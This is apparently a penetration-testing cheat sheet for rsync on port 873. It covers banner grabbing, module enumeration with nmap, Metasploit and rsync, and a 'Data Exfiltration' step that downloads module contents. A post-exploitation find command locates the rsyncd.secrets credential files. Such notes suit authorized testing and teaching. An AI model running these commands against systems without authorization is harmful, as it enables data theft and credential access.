PRIMARY CATEGORY → PROTOCOLS AND SERVICES
| REFERENCES | |
|---|---|
| Pentesting RSync | See here |
RSYNC → Remote Sync
Ports
TCP
- 873
This port is normally used when rsync is run as daemon to allow data transfer and modules management
Connection
Connect to an Rsync Server
rsync rsync://<USER>@<TARGET>:<PORT>Enumeration
Banner Grabbing
Netcat
nc -vn <TARGET> 873Telnet
telnet <TARGET> 873Nmap
nmap -p873 -sV -T5 -n -Pn --disable-arp-ping <TARGET>Modules/Shared Folders Enumeration
A Rsync Module usually refers to a directory or path on the system
[backup] # Module Name
path = /var/backups # Shared Folder
comment = Backups
read only = yes
list = yes # Module can be listedAn Rsync Module can be listed as long as It is configured as visible →
list = yes
Nmap
nmap -p873 -T5 --script rsync-list-modules -n -Pn --disable-arp-ping <TARGET>Metasploit
msfconsole
> use auxiliary/scanner/rsync/modules_list
> set RHOSTS <TARGET>
> runRsync
- List all Modules that can be listed
rsync <TARGET>::The
::syntax indicates that thersyncclient connects in daemon mode
- List all Information related to a specific Module
rsync -av --list-only rsync://<TARGET>:<PORT>/<MODULE_NAME>- If Authentication is required →
rsync -av --list-only rsync://<USER>@<TARGET>:<PORT>/<MODULE_NAME>Exploitation
Data Exfiltration
Download All the Rsync Module Content
rsync --progress -avz <TARGET>::<MODULE_NAME> <LOCAL_PATH>rsync --progress -avz rsync://<TARGET>:<PORT>/<MODULE_NAME> <LOCAL_PATH>- If Authentication is required →
rsync --progress -avz rsync://<USER>@<TARGET>:<PORT>/<MODULE_NAME> <LOCAL_PATH>Post-Exploitation
Rsyncd.conf & Rsyncd.secrets
find /etc \( -iname rsyncd.conf -o -iname rsyncd.secrets \) -ls 2> /dev/null